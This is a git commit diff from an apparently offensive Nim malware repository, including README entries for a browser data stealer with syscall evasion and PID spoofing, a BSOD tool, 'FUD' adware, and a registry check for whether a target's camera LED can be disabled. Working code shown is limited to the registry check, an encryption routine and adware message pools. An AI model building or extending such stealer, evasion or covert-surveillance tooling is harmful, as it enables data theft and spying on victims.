[S] moved some files. Added browser.nim.

elinethingz/README.md

@@ -10,11 +10,10 @@ Takes an input bytearray and writes it to disk as first CLI argument when run.
 format:
 [seq[byte]](@[0x40,0x80]
 
-
-
 # encfile.nim
 Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
 Has a fingerprint/is detectable.
+
 # OFFENSIVEencfile.nim
 Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
 Has a fingerprint/is detectable.
@@ -22,18 +21,20 @@ Has a fingerprint/is detectable.
 # Packer.nim
 Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework.
 
+# checkfile.nim
+Basic program that uses direct/hidden syscalls to know if a file exists. Undetectable in normal conditions.
+Can be chained with other direct syscalls to copy sensitive files.
+
+# Browser.nim
+Uses direct syscalls to know if Firefox and Chrome are installed. Afterwards, steals the files, puts them in an encrypted archive and encrypts it with AES-256 (HMAC SHA512_256 derivation). Undetectable in theory and practice. Spoofs PID.
 
 # bsod.nim
 Serves a BSOD to targets on Windows.
 
+# basicadware.nim
+Basic adware. Selects messages based on a pool. FUD.
+
 # mic_reg.nim
 
 [Broken]
 Checks if Windows OSD is enabled.
-
-# checkfile.nim
-Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
-Can be chained with other direct syscalls to copy sensitive files.
-
-# basicadware.nim
-Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.

elinethingz/mic_reg.nim

@@ -1,47 +0,0 @@
-#  ____  _____ ____ ____  _____ _____ 
-# / ___|| ____/ ___|  _ \| ____|_   _|
-# \___ \|  _|| |   | |_) |  _|   | |
-#  ___) | |__| |___|  _ <| |___  | |
-# |____/|_____\____|_| \_\_____| |_|
-
-import winim
-
-# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
-# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
-# therefore, this program does not guarantee that the user will not know about the observation.
-
-# DOES NOT WORK.
-const
-  KEY_QUERY_VALUE = 0x0001
-  HKEY_HANDLE = 0x80000002
-
-proc checkRegistryEntry(): bool =
-  var hKey: HKEY
-  var value: DWORD
-  var dataSize: DWORD = sizeof(DWORD)
-  
-  if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS:
-    echo "Error opening registry key. Error code:", GetLastError()
-    return false
-
-  if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS:
-    echo "Error querying registry value. Error code:", GetLastError()
-
-    # Close the registry key even if querying failed
-    RegCloseKey(hKey)
-    
-    return false
-
-  # Close the registry key if everything is successful
-  RegCloseKey(hKey)
-
-  echo "NoPhysicalCameraLED value:", value
-
-  return value == 0x1
-
-# Example usage
-if checkRegistryEntry():
-  echo "NoPhysicalCameraLED is set to 0x1."
-else:
-  echo "NoPhysicalCameraLED is not set to 0x1."
-

elinethingz/security/stage1/mic_reg.nim

@@ -0,0 +1,15 @@
+#  ____  _____ ____ ____  _____ _____ 
+# / ___|| ____/ ___|  _ \| ____|_   _|
+# \___ \|  _|| |   | |_) |  _|   | |
+#  ___) | |__| |___|  _ <| |___  | |
+# |____/|_____\____|_| \_\_____| |_|
+
+
+# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
+# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
+# therefore, this program does not guarantee that the user will not know about the observation.
+
+# Might work. Untested, honestly.
+# HKLM\\SOFTWARE\\Microsoft\\OEM\\Device\\Capture\\NoPhysicalCameraLED
+
+# 0x0 means false, 0x1 true

elinethingz/security/stage2/OFFENSIVEencfile.nim

@@ -211,21 +211,12 @@ proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) =
 #             with big files
 #             Default is 64KB.
 proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
-    try:
     let fIn =  newFileStream(infile, mode = fmRead)
     defer: fIn.close()
-
     let fOut = newFileStream(outfile, mode = fmWrite)
     defer: fOut.close()
-
     encryptStream(fIn, fOut, passw, bufferSize)
 
-    except CatchableError:
-        let
-            e = getCurrentException()
-            msg = getCurrentExceptionMsg()
-        echo "Inside checkIn, got exception ", repr(e), " with message ", msg
-
 
 
 #encryptFile("dza.png", "file.aes", "long-and-random-password", 1024)

elinethingz/security/stage2/basicadware.nim

@@ -19,8 +19,7 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
 
 
 var
-    titlemessages = @["Are you really free?",
-    "Poland!"]
+    titlemessages = @["Are you really free?","You got games on your phone?","Poland!"]
     captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
     "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
 randomize() # seeds randomizer 

elinethingz/security/stage2/browser.nim

@@ -0,0 +1,7 @@
+#    _____ ___  ____     ____  _____ ____ ____  _____ _____ 
+#   |_   _/ _ \|  _ \   / ___|| ____/ ___|  _ \| ____|_   _|
+#     | || | | | |_) |  \___ \|  _|| |   | |_) |  _|   | |
+#     | || |_| |  __/    ___) | |__| |___|  _ <| |___  | |
+#     |_| \___/|_|      |____/|_____\____|_| \_\_____| |_|
+
+